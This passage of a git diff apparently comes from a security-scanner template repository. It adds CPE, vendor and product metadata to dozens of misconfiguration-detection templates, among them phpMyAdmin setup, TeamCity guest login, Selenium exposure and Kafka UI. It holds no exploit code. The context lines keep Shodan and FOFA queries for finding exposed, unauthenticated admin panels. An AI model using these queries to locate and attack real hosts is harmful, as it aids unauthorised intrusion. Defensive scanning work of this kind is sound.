+ product: php
+ vendor: php
tags: misconfig,phpcli,intrusive
+ classification:
+ cpe: cpe:2.3:a:php:php:*:*:*:*:*:*:*:*
http:
- method: GET
path:
diff --git a/http/misconfiguration/phpmyadmin/phpmyadmin-setup.yaml b/http/misconfiguration/phpmyadmin/phpmyadmin-setup.yaml
index 9d6498e29a..d73ee0c3d2 100644
--- a/http/misconfiguration/phpmyadmin/phpmyadmin-setup.yaml
+++ b/http/misconfiguration/phpmyadmin/phpmyadmin-setup.yaml
@@ -9,10 +9,13 @@ info:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 5.3
cwe-id: CWE-200
+ cpe: cpe:2.3:a:phpmyadmin:phpmyadmin:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 16
shodan-query: http.html:"phpMyAdmin"
+ product: phpmyadmin
+ vendor: phpmyadmin
tags: phpmyadmin,misconfig
http:
@@ -52,4 +55,4 @@ http:
- type: status
status:
- 200
-# digest: 4b0a00483046022100fc3760ea202e7b87c292f6d08d4a23db0beb64d9718152fe73cc0aa72f696fdb022100e9e7d0c188bf1b7ac7b337bd91b9d44e138fd06df749d46358e50c4a8fc16b4d:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100fc3760ea202e7b87c292f6d08d4a23db0beb64d9718152fe73cc0aa72f696fdb022100e9e7d0c188bf1b7ac7b337bd91b9d44e138fd06df749d46358e50c4a8fc16b4d:922c64590222798bb761d5b6d8e72950
diff --git a/http/misconfiguration/puppetdb-dashboard.yaml b/http/misconfiguration/puppetdb-dashboard.yaml
index 6788facca7..c463add103 100644
--- a/http/misconfiguration/puppetdb-dashboard.yaml
+++ b/http/misconfiguration/puppetdb-dashboard.yaml
@@ -9,10 +9,13 @@ info:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0
cwe-id: CWE-200
+ cpe: cpe:2.3:a:puppet:puppetdb:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
shodan-query: 'title:"PuppetDB: Dashboard"'
+ product: puppetdb
+ vendor: puppet
tags: misconfig,exposure,puppetdb
http:
diff --git a/http/misconfiguration/python-metrics.yaml b/http/misconfiguration/python-metrics.yaml
index 4bc70fdeb2..0176222859 100644
--- a/http/misconfiguration/python-metrics.yaml
+++ b/http/misconfiguration/python-metrics.yaml
@@ -10,8 +10,12 @@ info:
metadata:
max-request: 1
shodan-query: html:"python_gc_objects_collected_total"
+ product: python
+ vendor: python
tags: exposure,devops,python,misconfig
+ classification:
+ cpe: cpe:2.3:a:python:python:*:*:*:*:*:*:*:*
http:
- method: GET
path:
diff --git a/http/misconfiguration/rabbitmq-exporter-metrics.yaml b/http/misconfiguration/rabbitmq-exporter-metrics.yaml
index f96905d1d3..b562edef53 100644
--- a/http/misconfiguration/rabbitmq-exporter-metrics.yaml
+++ b/http/misconfiguration/rabbitmq-exporter-metrics.yaml
@@ -9,8 +9,12 @@ info:
verified: true
max-request: 1
shodan-query: title:"RabbitMQ Exporter"
+ product: rabbitmq
+ vendor: vmware
tags: rabbitmq,exposure,debug,misconfig
+ classification:
+ cpe: cpe:2.3:a:vmware:rabbitmq:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -28,4 +32,4 @@ http:
- type: status
status:
- 200
-# digest: 4b0a004830460221008c9936da1018e9ceae9c551480ce1910a77cf9523b75cb3a00d71b630d7eec7d022100bf3adcc40ff775fb1e9ee78411e46ad8f08010088cba430ba87958e4b7d8d801:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a004830460221008c9936da1018e9ceae9c551480ce1910a77cf9523b75cb3a00d71b630d7eec7d022100bf3adcc40ff775fb1e9ee78411e46ad8f08010088cba430ba87958e4b7d8d801:922c64590222798bb761d5b6d8e72950
diff --git a/http/misconfiguration/ray-dashboard.yaml b/http/misconfiguration/ray-dashboard.yaml
index 84585bb2fa..15b36fa00a 100644
--- a/http/misconfiguration/ray-dashboard.yaml
+++ b/http/misconfiguration/ray-dashboard.yaml
@@ -9,8 +9,12 @@ info:
verified: true
max-request: 1
shodan-query: title:"Ray Dashboard"
+ product: ray
+ vendor: ray_project
tags: misconfig,exposure,ray
+ classification:
+ cpe: cpe:2.3:a:ray_project:ray:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -28,4 +32,4 @@ http:
- type: status
status:
- 200
-# digest: 4a0a00473045022100dd33631ae13e692dba3059141a502b0205f85e26f696372ca654d2605f3e912802204c3ffe062784966281bbd6ab1e5ab8f797beef09d5c1765d31ffa3ba0680f7dd:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100dd33631ae13e692dba3059141a502b0205f85e26f696372ca654d2605f3e912802204c3ffe062784966281bbd6ab1e5ab8f797beef09d5c1765d31ffa3ba0680f7dd:922c64590222798bb761d5b6d8e72950
diff --git a/http/misconfiguration/request-baskets-exposure.yaml b/http/misconfiguration/request-baskets-exposure.yaml
index 61df9e73d1..4cb64b6731 100644
--- a/http/misconfiguration/request-baskets-exposure.yaml
+++ b/http/misconfiguration/request-baskets-exposure.yaml
@@ -12,8 +12,12 @@ info:
verified: true
max-request: 1
shodan-query: html:"request-baskets"
+ product: request_baskets
+ vendor: rbaskets
tags: misconfig,requests-baskets,exposure
+ classification:
+ cpe: cpe:2.3:a:rbaskets:request_baskets:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -34,4 +38,4 @@ http:
- type: status
status:
- 200
-# digest: 4b0a00483046022100fa78a210d11be0b983da6d176dd620213458b20c223773dd517f3d50a2170b440221009b8bfc94b1596f0857e78932cdf803bc9efda41d8d0e8a2d2e7f91d238f09865:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100fa78a210d11be0b983da6d176dd620213458b20c223773dd517f3d50a2170b440221009b8bfc94b1596f0857e78932cdf803bc9efda41d8d0e8a2d2e7f91d238f09865:922c64590222798bb761d5b6d8e72950
diff --git a/http/misconfiguration/selenium-exposure.yaml b/http/misconfiguration/selenium-exposure.yaml
index 96983c9882..3d012fc865 100644
--- a/http/misconfiguration/selenium-exposure.yaml
+++ b/http/misconfiguration/selenium-exposure.yaml
@@ -13,8 +13,12 @@ info:
verified: true
max-request: 1
shodan-query: "/wd/hub"
+ product: selenium
+ vendor: selenium
tags: misconfig,selenium,misconfiguration,rce,chromium
+ classification:
+ cpe: cpe:2.3:a:selenium:selenium:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -34,4 +38,4 @@ http:
- type: status
status:
- 200
-# digest: 4b0a00483046022100e8d01ef950283916ecd4b7a51ca1894c38c202a983e026809017a5aedcb0f24c0221008947d091988dbb5004c534962daef5c3ed109e158800d62db4d3e4d1dbafb7d2:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100e8d01ef950283916ecd4b7a51ca1894c38c202a983e026809017a5aedcb0f24c0221008947d091988dbb5004c534962daef5c3ed109e158800d62db4d3e4d1dbafb7d2:922c64590222798bb761d5b6d8e72950
diff --git a/http/misconfiguration/sentinel-license-monitor.yaml b/http/misconfiguration/sentinel-license-monitor.yaml
index 59d0e62c69..c710705a2d 100644
--- a/http/misconfiguration/sentinel-license-monitor.yaml
+++ b/http/misconfiguration/sentinel-license-monitor.yaml
@@ -8,8 +8,12 @@ info:
verified: true
max-request: 1
shodan-query: html:"Sentinel License Monitor"
+ product: sentinel
+ vendor: trioniclabs
tags: misconfig,sentinel,license,monitor
+ classification:
+ cpe: cpe:2.3:a:trioniclabs:sentinel:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -27,4 +31,4 @@ http:
- type: status
status:
- 200
-# digest: 4b0a00483046022100801dfc952bec31796c7202016051fb5d6cd7a31d1582f6bab25138390ec5ef1d022100d474627bbaae6c5ee906b8b63f3a880515ad614c7e6ce992640bd563dc501a22:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100801dfc952bec31796c7202016051fb5d6cd7a31d1582f6bab25138390ec5ef1d022100d474627bbaae6c5ee906b8b63f3a880515ad614c7e6ce992640bd563dc501a22:922c64590222798bb761d5b6d8e72950
diff --git a/http/misconfiguration/servicenow-widget-misconfig.yaml b/http/misconfiguration/servicenow-widget-misconfig.yaml
index f134cb57e1..05a3f8d5db 100644
--- a/http/misconfiguration/servicenow-widget-misconfig.yaml
+++ b/http/misconfiguration/servicenow-widget-misconfig.yaml
@@ -12,8 +12,12 @@ info:
verified: true
max-request: 54
shodan-query: title:"servicenow"
+ product: servicenow
+ vendor: servicenow
tags: servicenow,widget,misconfig
+ classification:
+ cpe: cpe:2.3:a:servicenow:servicenow:*:*:*:*:*:*:*:*
http:
- raw:
- |
diff --git a/http/misconfiguration/sftpgo-admin-setup.yaml b/http/misconfiguration/sftpgo-admin-setup.yaml
index 8e40e67e89..4b4733da4f 100644
--- a/http/misconfiguration/sftpgo-admin-setup.yaml
+++ b/http/misconfiguration/sftpgo-admin-setup.yaml
@@ -10,8 +10,12 @@ info:
max-request: 1
verified: true
fofa-query: title="SFTPGo - Setup"
+ product: sftpgo
+ vendor: sftpgo_project
tags: sftpgo,misconfig,setup
+ classification:
+ cpe: cpe:2.3:a:sftpgo_project:sftpgo:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -29,4 +33,4 @@ http:
- type: status
status:
- 200
-# digest: 4b0a00483046022100cb184d53545e58eced5b1d9a3e2c9497c33a092937a7d9fc02f246a36ef33df00221008bf8e0a937d58c9fedfd123c2653afaf1700d070072f59dc0cdffc5968f3cf33:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100cb184d53545e58eced5b1d9a3e2c9497c33a092937a7d9fc02f246a36ef33df00221008bf8e0a937d58c9fedfd123c2653afaf1700d070072f59dc0cdffc5968f3cf33:922c64590222798bb761d5b6d8e72950
diff --git a/http/misconfiguration/slurm-hpc-dashboard.yaml b/http/misconfiguration/slurm-hpc-dashboard.yaml
index 91977d7c73..447e6749d3 100644
--- a/http/misconfiguration/slurm-hpc-dashboard.yaml
+++ b/http/misconfiguration/slurm-hpc-dashboard.yaml
@@ -12,10 +12,13 @@ info:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 5.3
cwe-id: CWE-200
+ cpe: cpe:2.3:a:schedmd:slurm:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
shodan-query: title:"Slurm HPC Dashboard"
+ product: slurm
+ vendor: schedmd
tags: misconfig,slurm,dashboard
http:
diff --git a/http/misconfiguration/smarterstats-setup.yaml b/http/misconfiguration/smarterstats-setup.yaml
index 5b8387cafc..32ca3f449b 100644
--- a/http/misconfiguration/smarterstats-setup.yaml
+++ b/http/misconfiguration/smarterstats-setup.yaml
@@ -9,8 +9,12 @@ info:
verified: true
max-request: 1
shodan-query: title:"Welcome to SmarterStats!"
+ product: smarterstats
+ vendor: smartertools
tags: misconfig,smarterstats,exposure
+ classification:
+ cpe: cpe:2.3:a:smartertools:smarterstats:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -36,4 +40,4 @@ http:
- type: status
status:
- 200
-# digest: 490a0046304402206454ce457c8b5ea9dbeb5ca7a4cfce7f32858c87fe5767cbe12fba7911c91604022018baea3ff3e94b9f5670c77b8517bce8030970fa21d98a1eb30be18d2ae1fe55:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a0046304402206454ce457c8b5ea9dbeb5ca7a4cfce7f32858c87fe5767cbe12fba7911c91604022018baea3ff3e94b9f5670c77b8517bce8030970fa21d98a1eb30be18d2ae1fe55:922c64590222798bb761d5b6d8e72950
diff --git a/http/misconfiguration/smokeping-grapher.yaml b/http/misconfiguration/smokeping-grapher.yaml
index f3557e5172..1963457fa9 100644
--- a/http/misconfiguration/smokeping-grapher.yaml
+++ b/http/misconfiguration/smokeping-grapher.yaml
@@ -11,8 +11,12 @@ info:
verified: true
max-request: 1
shodan-query: title:"SmokePing Latency Page for Network Latency Grapher"
+ product: smokeping
+ vendor: smokeping
tags: misconfig,smokeping,latency,grapher
+ classification:
+ cpe: cpe:2.3:a:smokeping:smokeping:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -28,4 +32,4 @@ http:
- type: status
status:
- 200
-# digest: 4b0a0048304602210093977592f924589f38b0d3ce6d54c601887c3757b346a722ef5ce3eaf97bba15022100b554db331a1ef594a70b073a4bd6ea63b6baca597b7df6b1dc8711a9ae9f7e5a:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a0048304602210093977592f924589f38b0d3ce6d54c601887c3757b346a722ef5ce3eaf97bba15022100b554db331a1ef594a70b073a4bd6ea63b6baca597b7df6b1dc8711a9ae9f7e5a:922c64590222798bb761d5b6d8e72950
diff --git a/http/misconfiguration/solr-query-dashboard.yaml b/http/misconfiguration/solr-query-dashboard.yaml
index 2f014d6825..6d4e6b9082 100644
--- a/http/misconfiguration/solr-query-dashboard.yaml
+++ b/http/misconfiguration/solr-query-dashboard.yaml
@@ -9,8 +9,12 @@ info:
- https://www.exploit-db.com/ghdb/5856
metadata:
max-request: 2
+ product: solr
+ vendor: apache
tags: solr,unauth,edb,misconfig
+ classification:
+ cpe: cpe:2.3:a:apache:solr:*:*:*:*:*:*:*:*
http:
- method: GET
path:
diff --git a/http/misconfiguration/sonarqube-projects-disclosure.yaml b/http/misconfiguration/sonarqube-projects-disclosure.yaml
index 4c11c81f3e..666bbd8565 100644
--- a/http/misconfiguration/sonarqube-projects-disclosure.yaml
+++ b/http/misconfiguration/sonarqube-projects-disclosure.yaml
@@ -14,8 +14,12 @@ info:
max-request: 1
shodan-query: title:"Sonarqube"
fofa-query: app="sonarQube-代码管理"
+ product: sonarqube
+ vendor: sonarsource
tags: sonarqube,exposure,misconfig
+ classification:
+ cpe: cpe:2.3:a:sonarsource:sonarqube:*:*:*:*:*:*:*:*
http:
- method: GET
path:
diff --git a/http/misconfiguration/springboot/springboot-auditevents.yaml b/http/misconfiguration/springboot/springboot-auditevents.yaml
index ca00601e90..8aba1c97a4 100644
--- a/http/misconfiguration/springboot/springboot-auditevents.yaml
+++ b/http/misconfiguration/springboot/springboot-auditevents.yaml
@@ -11,10 +11,13 @@ info:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0
cwe-id: CWE-200
+ cpe: cpe:2.3:a:vmware:spring_boot:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 2
shodan-query: title:"Eureka"
+ product: spring_boot
+ vendor: vmware
tags: misconfig,springboot,exposure
http:
diff --git a/http/misconfiguration/sql-server-report-viewer.yaml b/http/misconfiguration/sql-server-report-viewer.yaml
index 0cb1bc83ab..aacd516a5d 100644
--- a/http/misconfiguration/sql-server-report-viewer.yaml
+++ b/http/misconfiguration/sql-server-report-viewer.yaml
@@ -11,8 +11,12 @@ info:
verified: true
max-request: 2
google-query: inurl:"/Reports/Pages/Folder.aspx"
+ product: sql_server
+ vendor: microsoft
tags: misconfig,sql,report,exposure
+ classification:
+ cpe: cpe:2.3:a:microsoft:sql_server:*:*:*:*:*:*:*:*
http:
- raw:
- |
@@ -28,4 +32,4 @@ http:
- "status_code_1 == 200 && status_code_2 != 401"
- "contains(body, 'Data Source') && contains(body, 'SQL Server Reporting Services')"
condition: and
-# digest: 4b0a004830460221008feccb6f64b565bdc0c250a76bf836e3fa99a59c5a9b7f80327b4f4628fdeaa60221008a23345dd57c7dbbce3370ad35499b7aaf50fe496815d0d9c30740b73e81bccf:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a004830460221008feccb6f64b565bdc0c250a76bf836e3fa99a59c5a9b7f80327b4f4628fdeaa60221008a23345dd57c7dbbce3370ad35499b7aaf50fe496815d0d9c30740b73e81bccf:922c64590222798bb761d5b6d8e72950
diff --git a/http/misconfiguration/struts-ognl-console.yaml b/http/misconfiguration/struts-ognl-console.yaml
index a6854cee26..e6bfaef00f 100644
--- a/http/misconfiguration/struts-ognl-console.yaml
+++ b/http/misconfiguration/struts-ognl-console.yaml
@@ -13,8 +13,12 @@ info:
verified: true
max-request: 1
shodan-query: html:"Struts Problem Report"
+ product: struts
+ vendor: apache
tags: apache,struts,ognl,panel,misconfig
+ classification:
+ cpe: cpe:2.3:a:apache:struts:*:*:*:*:*:*:*:*
http:
- method: GET
path:
diff --git a/http/misconfiguration/symfony-debug.yaml b/http/misconfiguration/symfony-debug.yaml
index 3090850271..9f72409569 100644
--- a/http/misconfiguration/symfony-debug.yaml
+++ b/http/misconfiguration/symfony-debug.yaml
@@ -11,8 +11,12 @@ info:
verified: true
max-request: 4
shodan-query: http.html:"symfony Profiler"
+ product: symfony
+ vendor: sensiolabs
tags: symfony,debug,misconfig
+ classification:
+ cpe: cpe:2.3:a:sensiolabs:symfony:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -38,4 +42,4 @@ http:
- 'debug mode is enabled.'
- 'id="sfWebDebugSymfony"'
condition: or
-# digest: 4a0a00473045022069056fb64b4574b300514814e9e34e3e7e6c16b214fe362580f5fc0f3d89f3020221008ee8fee42144aafbe47e2bf3fc62312b5cefdbf641f3a5264aa774f27d9ffdd4:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022069056fb64b4574b300514814e9e34e3e7e6c16b214fe362580f5fc0f3d89f3020221008ee8fee42144aafbe47e2bf3fc62312b5cefdbf641f3a5264aa774f27d9ffdd4:922c64590222798bb761d5b6d8e72950
diff --git a/http/misconfiguration/symfony-fragment.yaml b/http/misconfiguration/symfony-fragment.yaml
index c8908a806d..4a6afb0e0d 100644
--- a/http/misconfiguration/symfony-fragment.yaml
+++ b/http/misconfiguration/symfony-fragment.yaml
@@ -15,8 +15,12 @@ info:
verified: true
max-request: 1
shodan-query: http.html:"symfony Profiler"
+ product: symfony
+ vendor: sensiolabs
tags: config,exposure,symfony,misconfig
+ classification:
+ cpe: cpe:2.3:a:sensiolabs:symfony:*:*:*:*:*:*:*:*
http:
- method: GET
path:
diff --git a/http/misconfiguration/syncthing-dashboard.yaml b/http/misconfiguration/syncthing-dashboard.yaml
index 16ad3b9d71..1d9780530b 100644
--- a/http/misconfiguration/syncthing-dashboard.yaml
+++ b/http/misconfiguration/syncthing-dashboard.yaml
@@ -11,8 +11,12 @@ info:
verified: true
max-request: 1
shodan-query: http.html:'ng-app="syncthing"'
+ product: syncthing
+ vendor: syncthing
tags: misconfig,syncthing,exposure
+ classification:
+ cpe: cpe:2.3:a:syncthing:syncthing:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -33,4 +37,4 @@ http:
- type: status
status:
- 200
-# digest: 4a0a0047304502205db143cdb0dee37c6e955a52fafa998e05c4a6d0beb21eabb8d846c2a2c45b6f022100cc2a6b7afa3e6676037255c4d1db949251e3435545e3e87ccc60d370f2885c98:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502205db143cdb0dee37c6e955a52fafa998e05c4a6d0beb21eabb8d846c2a2c45b6f022100cc2a6b7afa3e6676037255c4d1db949251e3435545e3e87ccc60d370f2885c98:922c64590222798bb761d5b6d8e72950
diff --git a/http/misconfiguration/tasmota-config-webui.yaml b/http/misconfiguration/tasmota-config-webui.yaml
index 5c55685b6d..f7db62d699 100644
--- a/http/misconfiguration/tasmota-config-webui.yaml
+++ b/http/misconfiguration/tasmota-config-webui.yaml
@@ -11,8 +11,12 @@ info:
verified: true
max-request: 1
shodan-query: title:"Tasmota"
+ product: tasmota
+ vendor: tasmota_project
tags: misconfig,tasmota,exposure,config
+ classification:
+ cpe: cpe:2.3:o:tasmota_project:tasmota:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -42,4 +46,4 @@ http:
group: 1
regex:
- "Tasmota ([0-9.]+) "
-# digest: 4a0a004730450221009a3fb36a5c5568abcb2356994a89c068e827c0f59eda5689048364dd719c1c9c02203d3203f10e9c9017833676213cc6e692ee3c733b58d443ae8f084cf60d679ea4:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a004730450221009a3fb36a5c5568abcb2356994a89c068e827c0f59eda5689048364dd719c1c9c02203d3203f10e9c9017833676213cc6e692ee3c733b58d443ae8f084cf60d679ea4:922c64590222798bb761d5b6d8e72950
diff --git a/http/misconfiguration/teamcity/teamcity-guest-login-enabled.yaml b/http/misconfiguration/teamcity/teamcity-guest-login-enabled.yaml
index 5d32010fba..45271ed06e 100644
--- a/http/misconfiguration/teamcity/teamcity-guest-login-enabled.yaml
+++ b/http/misconfiguration/teamcity/teamcity-guest-login-enabled.yaml
@@ -13,10 +13,13 @@ info:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 7.3
cwe-id: CWE-200
+ cpe: cpe:2.3:a:jetbrains:teamcity:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
shodan-query: http.component:"TeamCity"
+ product: teamcity
+ vendor: jetbrains
tags: misconfig,teamcity,jetbrains
http:
diff --git a/http/misconfiguration/teamcity/teamcity-registration-enabled.yaml b/http/misconfiguration/teamcity/teamcity-registration-enabled.yaml
index 9e9de0350c..97233b261f 100644
--- a/http/misconfiguration/teamcity/teamcity-registration-enabled.yaml
+++ b/http/misconfiguration/teamcity/teamcity-registration-enabled.yaml
@@ -12,10 +12,13 @@ info:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 7.3
cwe-id: CWE-200
+ cpe: cpe:2.3:a:jetbrains:teamcity:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
shodan-query: http.component:"TeamCity"
+ product: teamcity
+ vendor: jetbrains
tags: misconfig,auth-bypass,teamcity,jetbrains,intrusive
http:
diff --git a/http/misconfiguration/teslamate-unauth-access.yaml b/http/misconfiguration/teslamate-unauth-access.yaml
index 845642aa56..27b2e97c98 100644
--- a/http/misconfiguration/teslamate-unauth-access.yaml
+++ b/http/misconfiguration/teslamate-unauth-access.yaml
@@ -11,8 +11,12 @@ info:
max-request: 1
shodan-query: http.favicon.hash:-1478287554
fofa-query: title="teslamate"
+ product: teslamate
+ vendor: teslamate_project
tags: misconfig,teslamate,unauth
+ classification:
+ cpe: cpe:2.3:a:teslamate_project:teslamate:*:*:*:*:*:*:*:*
http:
- method: GET
path:
diff --git a/http/misconfiguration/thinkphp-errors.yaml b/http/misconfiguration/thinkphp-errors.yaml
index bd0a14bc47..61ceebd195 100644
--- a/http/misconfiguration/thinkphp-errors.yaml
+++ b/http/misconfiguration/thinkphp-errors.yaml
@@ -9,8 +9,12 @@ info:
verified: true
max-request: 1
fofa-query: app="ThinkPHP" && title="System Error"
+ product: thinkphp
+ vendor: thinkphp
tags: thinkphp,misconfig,exposure
+ classification:
+ cpe: cpe:2.3:a:thinkphp:thinkphp:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -46,4 +50,4 @@ http:
- 500
- 404
condition: or
-# digest: 490a00463044022003b009962dedd16ae6b50cf5a4c5880e38788366de0a4365a425d5d5b1141ad60220631fa6eea81343a0d0fce43cf8db4c0e7d87a6dc9b02403426e526a5a04bd5dc:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a00463044022003b009962dedd16ae6b50cf5a4c5880e38788366de0a4365a425d5d5b1141ad60220631fa6eea81343a0d0fce43cf8db4c0e7d87a6dc9b02403426e526a5a04bd5dc:922c64590222798bb761d5b6d8e72950
diff --git a/http/misconfiguration/tomcat-stacktraces.yaml b/http/misconfiguration/tomcat-stacktraces.yaml
index 0f7b97d0f1..e793c21900 100644
--- a/http/misconfiguration/tomcat-stacktraces.yaml
+++ b/http/misconfiguration/tomcat-stacktraces.yaml
@@ -10,8 +10,12 @@ info:
verified: true
max-request: 1
shodan-query: title:"Apache Tomcat"
+ product: tomcat
+ vendor: apache
tags: misconfig,tech,tomcat,apache
+ classification:
+ cpe: cpe:2.3:a:apache:tomcat:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -24,4 +28,4 @@ http:
- 'contains(body, "org.apache")'
- status_code == 400
condition: and
-# digest: 4b0a00483046022100acbebae47fea74944e9c0ecc1ab66fca13dd7c4dbd8771d5601fed9db72a0cf0022100b63d7e443f534f20cbad1632af42b8c663ab034e41b5efeb67ff784e3ea3802f:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100acbebae47fea74944e9c0ecc1ab66fca13dd7c4dbd8771d5601fed9db72a0cf0022100b63d7e443f534f20cbad1632af42b8c663ab034e41b5efeb67ff784e3ea3802f:922c64590222798bb761d5b6d8e72950
diff --git a/http/misconfiguration/transmission-dashboard.yaml b/http/misconfiguration/transmission-dashboard.yaml
index 59d95b26cd..b7287aa4f4 100644
--- a/http/misconfiguration/transmission-dashboard.yaml
+++ b/http/misconfiguration/transmission-dashboard.yaml
@@ -11,10 +11,13 @@ info:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 5.3
cwe-id: CWE-200
+ cpe: cpe:2.3:a:transmissionbt:transmission:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
shodan-query: http.title:"Transmission Web Interface"
+ product: transmission
+ vendor: transmissionbt
tags: misconfig,transmission,exposure,dashboard
http:
diff --git a/http/misconfiguration/typo3-composer.yaml b/http/misconfiguration/typo3-composer.yaml
index fc20ce2939..52f9c545e0 100644
--- a/http/misconfiguration/typo3-composer.yaml
+++ b/http/misconfiguration/typo3-composer.yaml
@@ -12,8 +12,12 @@ info:
verified: true
max-request: 1
shodan-query: "X-TYPO3-Parsetime: 0ms"
+ product: typo3
+ vendor: typo3
tags: typo3,cms,exposure,misconfig
+ classification:
+ cpe: cpe:2.3:a:typo3:typo3:*:*:*:*:*:*:*:*
http:
- method: GET
path:
diff --git a/http/misconfiguration/typo3-debug-mode.yaml b/http/misconfiguration/typo3-debug-mode.yaml
index 7dc0f51c21..95cf35189b 100644
--- a/http/misconfiguration/typo3-debug-mode.yaml
+++ b/http/misconfiguration/typo3-debug-mode.yaml
@@ -9,8 +9,12 @@ info:
verified: true
max-request: 1
shodan-query: http.title:"TYPO3 Exception"
+ product: typo3
+ vendor: typo3
tags: typo3,debug,misconfig
+ classification:
+ cpe: cpe:2.3:a:typo3:typo3:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -28,4 +32,4 @@ http:
- type: status
status:
- 500
-# digest: 4a0a0047304502201ee7bbd8a77d4f954f0fcd10371c8958454bc550573570294a6e5cd1ca91ae04022100980d4e085f07ca32d2eaaf49e513b2a375889affd352bd0b364a819afc168fb6:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502201ee7bbd8a77d4f954f0fcd10371c8958454bc550573570294a6e5cd1ca91ae04022100980d4e085f07ca32d2eaaf49e513b2a375889affd352bd0b364a819afc168fb6:922c64590222798bb761d5b6d8e72950
diff --git a/http/misconfiguration/unauth-apache-kafka-ui.yaml b/http/misconfiguration/unauth-apache-kafka-ui.yaml
index 97c278b880..fe895220fa 100644
--- a/http/misconfiguration/unauth-apache-kafka-ui.yaml
+++ b/http/misconfiguration/unauth-apache-kafka-ui.yaml
@@ -12,8 +12,12 @@ info:
verified: true
max-request: 2
shodan-query: http.title:"UI for Apache Kafka"
+ product: kafka
+ vendor: apache
tags: misconfig,apache,kafka,unauth,exposure
+ classification:
+ cpe: cpe:2.3:a:apache:kafka:*:*:*:*:*:*:*:*
http:
- method: GET
path:
diff --git a/http/misconfiguration/unauth-celery-flower.yaml b/http/misconfiguration/unauth-celery-flower.yaml
index 13de5b3b8a..c7ea9ebd3a 100644
--- a/http/misconfiguration/unauth-celery-flower.yaml
+++ b/http/misconfiguration/unauth-celery-flower.yaml
@@ -9,8 +9,12 @@ info:
metadata:
max-request: 1
shodan-query: http.favicon.hash:-374133142
+ product: flower
+ vendor: flower_project
tags: celery,flower,unauth,misconfig
+ classification:
+ cpe: cpe:2.3:a:flower_project:flower:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -28,4 +32,4 @@ http:
- type: status
status:
- 200
-# digest: 490a00463044022035c4a49f967fe61a41af8ca9b7ef7593aae1af64378c0724f8d653c03b7c2f5b02205ce594331fc5fd9f4d464423082c469ef27162cbafa76ad3b0c569416bb81866:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a00463044022035c4a49f967fe61a41af8ca9b7ef7593aae1af64378c0724f8d653c03b7c2f5b02205ce594331fc5fd9f4d464423082c469ef27162cbafa76ad3b0c569416bb81866:922c64590222798bb761d5b6d8e72950
diff --git a/http/misconfiguration/unauth-etherpad.yaml b/http/misconfiguration/unauth-etherpad.yaml
index 9f8528c7bd..de89986046 100644
--- a/http/misconfiguration/unauth-etherpad.yaml
+++ b/http/misconfiguration/unauth-etherpad.yaml
@@ -10,8 +10,12 @@ info:
verified: true
max-request: 1
shodan-query: http.html:"index.createOpenPad"
+ product: etherpad
+ vendor: etherpad
tags: etherpad,misconfig,unauth
+ classification:
+ cpe: cpe:2.3:a:etherpad:etherpad:*:*:*:*:*:*:*:*
http:
- method: GET
path:
diff --git a/http/misconfiguration/unauth-ldap-account-manager.yaml b/http/misconfiguration/unauth-ldap-account-manager.yaml
index 45fef54473..4d8eefef4f 100644
--- a/http/misconfiguration/unauth-ldap-account-manager.yaml
+++ b/http/misconfiguration/unauth-ldap-account-manager.yaml
@@ -9,8 +9,12 @@ info:
verified: true
max-request: 1
